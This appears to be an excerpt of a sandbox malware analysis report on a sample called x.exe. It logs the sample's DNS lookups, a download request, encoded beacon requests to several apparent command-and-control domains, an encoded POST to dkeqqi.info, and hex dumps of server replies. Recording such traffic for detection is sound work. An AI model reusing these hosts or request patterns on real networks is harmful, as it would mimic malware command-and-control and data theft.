Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 5_2_00E922EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

5_2_00E922EE

Source: global traffic	HTTP traffic detected: GET /exl04d3r HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.atc-secure.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /5ann/?JZUdV=4PTBgoI4Nk+6taqoVFprwB5aZoYGl9E6V/JZkPplqb8lwhYldWpADaEwQ8nNR5l8WRgTp7EOccAoFUesNBdOy91OVftJQnJFRUzQgcoTf7uhusbELCzNmdBMEz0QkWcG564v2LW/vVxA&P6dd=u67x_JxpTPYtyd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-usHost: www.jackys.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.2; D6616 Build/23.1.C.0.385) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /rks3/?JZUdV=N6M995Orsid3pB26180eAnpAEvm/2qnuV89lwLb32fuWKk7JFM+tdeUXnBmOTgnaI+4AwNPnaGa9vLA9D5aQFoYdwWd1CZaTGXr2033v5dNU21/t+k0hMUZXqVo2LiN65qUPK/5Ezd1/&P6dd=u67x_JxpTPYtyd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-usHost: www.dkeqqi.infoConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.2; D6616 Build/23.1.C.0.385) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /tubo/?P6dd=u67x_JxpTPYtyd&JZUdV=OkSlmVrxLDfT2X9rx8wbiJMZQIMCMOfzpX9YxeBYK1jilmQpea6mLrJJ/QaGwJsgIsWiewlWl8P0IGD0SqVUylEScGcqRQvVGsdu8t6k7Yl2rxpQgbhJVeIXOQxOY0z1qp54XHS0RO42 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-usHost: www.serenepath.lifeConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.2; D6616 Build/23.1.C.0.385) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /9pz6/?JZUdV=/pTPnllmxsWX6ApJIzAt41xOg/EHi2fsk6Lw8HTy75EEuanVhpcSs4PFfxAF5z77wIbwFr1jAUPlW96P2OGspxNewzlciOntjDGRX+Nq82f9quh1PQrldyIlPF5dnfcwElp/wWcZKnjx&P6dd=u67x_JxpTPYtyd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-usHost: www.chiro.liveConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.2; D6616 Build/23.1.C.0.385) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /r7y4/?P6dd=u67x_JxpTPYtyd&JZUdV=207Em3qmMG8XxNg7uI/8NwU97sJhk8AXa3bUsu1wH/MvrPJS7Jm86DxfHb9ZfS6rlK5B1hkXbHKd9Om6mRyjEpliA/NPjkE6R5dZshmibfWc3OphM4O1s5i1tyzqbiMk+XbEmWldFElu HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-usHost: www.celestial-guides.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.2; D6616 Build/23.1.C.0.385) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: www.atc-secure.com
Source: global traffic	DNS traffic detected: DNS query: www.jackys.shop
Source: global traffic	DNS traffic detected: DNS query: www.dkeqqi.info
Source: global traffic	DNS traffic detected: DNS query: www.serenepath.life
Source: global traffic	DNS traffic detected: DNS query: www.chiro.live
Source: global traffic	DNS traffic detected: DNS query: www.celestial-guides.shop
Source: global traffic	DNS traffic detected: DNS query: www.rtp189z.lat

Source: unknown

HTTP traffic detected: POST /rks3/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usAccept-Encoding: gzip, deflate, brHost: www.dkeqqi.infoOrigin: http://www.dkeqqi.infoCache-Control: no-cacheContent-Length: 218Connection: closeContent-Type: application/x-www-form-urlencodedReferer: http://www.dkeqqi.info/rks3/User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; D6616 Build/23.1.C.0.385) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36Data Raw: 4a 5a 55 64 56 3d 41 34 6b 64 2b 4d 69 37 74 42 77 34 6a 41 43 4e 79 39 49 74 45 69 34 6a 52 6f 6e 72 2b 6f 43 79 65 4b 63 67 79 70 6a 79 30 66 2f 4a 48 54 66 30 41 38 71 70 57 4b 63 6e 36 58 62 52 47 69 44 2b 65 49 77 5a 32 2f 4c 6f 62 56 72 41 6f 63 63 49 46 71 43 56 42 70 41 44 2f 52 46 35 48 63 62 33 48 32 6a 30 34 55 54 6b 2b 74 64 56 79 6e 7a 46 2b 7a 6f 6f 4e 32 56 56 34 6c 74 41 45 41 4a 37 73 64 6b 4f 65 64 56 67 78 76 5a 61 32 4f 31 52 58 66 6c 43 52 6e 75 38 74 2f 56 32 76 2f 68 4b 76 4c 6c 68 47 63 48 4f 67 65 74 6a 41 52 44 4b 51 46 61 76 33 61 52 33 61 6d 46 49 74 2b 66 2b 6c 54 64 67 39 37 5a 74 61 70 55 74 30 43 5a 6a 62 67 3d 3d Data Ascii: JZUdV=A4kd+Mi7tBw4jACNy9ItEi4jRonr+oCyeKcgypjy0f/JHTf0A8qpWKcn6XbRGiD+eIwZ2/LobVrAoccIFqCVBpAD/RF5Hcb3H2j04UTk+tdVynzF+zooN2VV4ltAEAJ7sdkOedVgxvZa2O1RXflCRnu8t/V2v/hKvLlhGcHOgetjARDKQFav3aR3amFIt+f+lTdg97ZtapUt0CZjbg==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 20 Jan 2025 14:25:25 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 20 Jan 2025 14:25:27 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Jan 2025 14:25:38 GMTServer: ApacheContent-Length: 32106Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 42 6f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Jan 2025 14:25:40 GMTServer: ApacheContent-Length: 32106Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 42 6f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Jan 2025 14:25:43 GMTServer: ApacheContent-Length: 32106Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 42 6f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Jan 2025 14:25:46 GMTServer: ApacheContent-Length: 32106Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 20 Jan 2025 14:26:05 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4f c3 30 0c 85 ef fd 15 66 27 38 2c 2e 55 91 38 44 91 60 ed c4 a4 32 2a 48 0f 1c b3 c5 5b 2a 95 a6 24 29 15 ff 9e b4 13 d2 2e 96 9e fd 3d fb 99 df 14 6f 1b f9 59 97 f0 22 5f 2b a8 9b e7 6a b7 81 d5 1a 71 57 ca 2d 62 21 8b cb 24 63 29 62 b9 5f 89 84 9b f0 d5 09 6e 48 e9 28 42 1b 3a 12 79 9a c3 de 06 d8 da b1 d7 1c 2f cd 84 e3 02 f1 83 d5 bf b3 ef 5e 5c 31 51 25 7c 10 d2 10 38 fa 1e c9 07 d2 d0 bc 57 30 29 0f 7d e4 4e 33 07 b6 87 60 5a 0f 9e dc 0f 39 c6 71 98 37 b9 58 94 d6 8e bc 17 4f 83 3a 1a c2 8c e5 ec 21 83 db e6 30 f6 61 bc 83 8f c5 00 2a c0 34 4d ec 48 5d bc d0 aa 6e 7d 1e 5b 4d 9e 79 63 07 a8 ad 0b f0 98 72 fc df 15 23 2f 61 63 bc f9 c9 e4 0f 44 5e 7d e7 1f 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f0MAO0f'8,.U8D`2H[$).=oY"_+jqW-b!$c)b_nH(B:y/^\1Q%\|8W0)}N3`Z9q7XO:!0a*4MH]n}[Mycr#/acD^}0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 20 Jan 2025 14:26:08 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4f c3 30 0c 85 ef fd 15 66 27 38 2c 2e 55 91 38 44 91 60 ed c4 a4 32 2a 48 0f 1c b3 c5 5b 2a 95 a6 24 29 15 ff 9e b4 13 d2 2e 96 9e fd 3d fb 99 df 14 6f 1b f9 59 97 f0 22 5f 2b a8 9b e7 6a b7 81 d5 1a 71 57 ca 2d 62 21 8b cb 24 63 29 62 b9 5f 89 84 9b f0 d5 09 6e 48 e9 28 42 1b 3a 12 79 9a c3 de 06 d8 da b1 d7 1c 2f cd 84 e3 02 f1 83 d5 bf b3 ef 5e 5c 31 51 25 7c 10 d2 10 38 fa 1e c9 07 d2 d0 bc 57 30 29 0f 7d e4 4e 33 07 b6 87 60 5a 0f 9e dc 0f 39 c6 71 98 37 b9 58 94 d6 8e bc 17 4f 83 3a 1a c2 8c e5 ec 21 83 db e6 30 f6 61 bc 83 8f c5 00 2a c0 34 4d ec 48 5d bc d0 aa 6e 7d 1e 5b 4d 9e 79 63 07 a8 ad 0b f0 98 72 fc df 15 23 2f 61 63 bc f9 c9 e4 0f 44 5e 7d e7 1f 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f0MAO0f'8,.U8D`2H[$).=oY"_+jqW-b!$c)b_nH(B:y/^\1Q%\|8W0)}N3`Z9q7XO:!0a*4MH]n}[Mycr#/acD^}0
